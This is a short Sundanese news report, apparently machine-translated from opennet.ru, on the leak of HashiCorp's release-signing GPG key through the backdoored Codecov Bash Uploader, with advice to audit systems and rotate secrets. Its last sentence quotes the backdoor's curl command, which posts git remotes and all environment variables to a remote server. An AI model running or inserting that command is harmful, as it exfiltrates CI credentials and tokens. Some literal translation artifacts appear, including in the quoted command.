HashiCorp, anu dikenal pikeun ngembangkeun alat open source Vagrant, Packer, Nomad sareng Terraform, ngumumkeun bocorna konci GPG pribadi anu dianggo pikeun nyiptakeun tanda tangan digital anu pariksa rilis. Penyerang anu meunang aksés ka konci GPG berpotensi nyieun parobahan disumputkeun kana produk HashiCorp ku verifying aranjeunna ku tanda tangan digital bener. Dina waktos anu sami, perusahaan nyatakeun yén salami pamariksaan, teu aya jejak usaha pikeun modifikasi sapertos kitu anu dicirikeun.
Ayeuna, konci GPG anu dikompromi parantos dicabut sareng konci énggal parantos diwanohkeun dina tempatna. Masalahna ngan ukur mangaruhan verifikasi nganggo file SHA256SUM sareng SHA256SUM.sig, sareng henteu mangaruhan generasi tanda tangan digital pikeun Linux DEB sareng bungkusan RPM anu disayogikeun ngalangkungan releases.hashicorp.com, ogé mékanisme verifikasi pelepasan pikeun macOS sareng Windows (AuthentiCode) .
Bocoran lumangsung alatan pamakéan skrip Codecov Bash Uploader (codecov-bash) dina infrastruktur, dirancang pikeun ngundeur laporan sinyalna tina sistem integrasi kontinyu. Salila serangan ka perusahaan Codecov, backdoor disumputkeun kana skrip anu ditangtukeun, dimana kecap akses sareng konci enkripsi dikirim ka server panyerang.
Pikeun hack, panyerang ngamangpaatkeun kasalahan dina prosés nyiptakeun gambar Codecov Docker, anu ngamungkinkeun aranjeunna nimba data aksés ka GCS (Google Cloud Storage), perlu pikeun ngarobih skrip Bash Uploader anu disebarkeun tina codecov.io. ramatloka. Parobihan éta dilakukeun deui dina 31 Januari, tetep teu kapendak salami dua bulan sareng ngantepkeun panyerang nimba inpormasi anu disimpen dina lingkungan sistem integrasi kontinyu pelanggan. Nganggo kode jahat tambahan, panyerang tiasa nampi inpormasi ngeunaan gudang Git anu diuji sareng sadaya variabel lingkungan, kalebet token, konci enkripsi sareng kecap akses anu dikirimkeun ka sistem integrasi kontinyu pikeun ngatur aksés kana kode aplikasi, repositori sareng jasa sapertos Amazon Web Services sareng GitHub.
Salian nelepon langsung, skrip Codecov Bash Uploader dipaké salaku bagian tina uploaders séjén, kayaning Codecov-aksi (Github), Codecov-circleci-orb jeung Codecov-bitrise-step, anu pamaké ogé kapangaruhan ku masalah. Sadaya pangguna codecov-bash sareng produk anu aya hubunganana disarankeun pikeun ngaudit infrastrukturna, ogé ngarobih kecap akses sareng konci enkripsi. Anjeun tiasa pariksa ayana backdoor dina naskah ku ayana garis curl -sm 0.5 -d "$(git remote -v)<<<<<< ENV $(env)" http:// /upload/v2 || leres
sumber: opennet.ru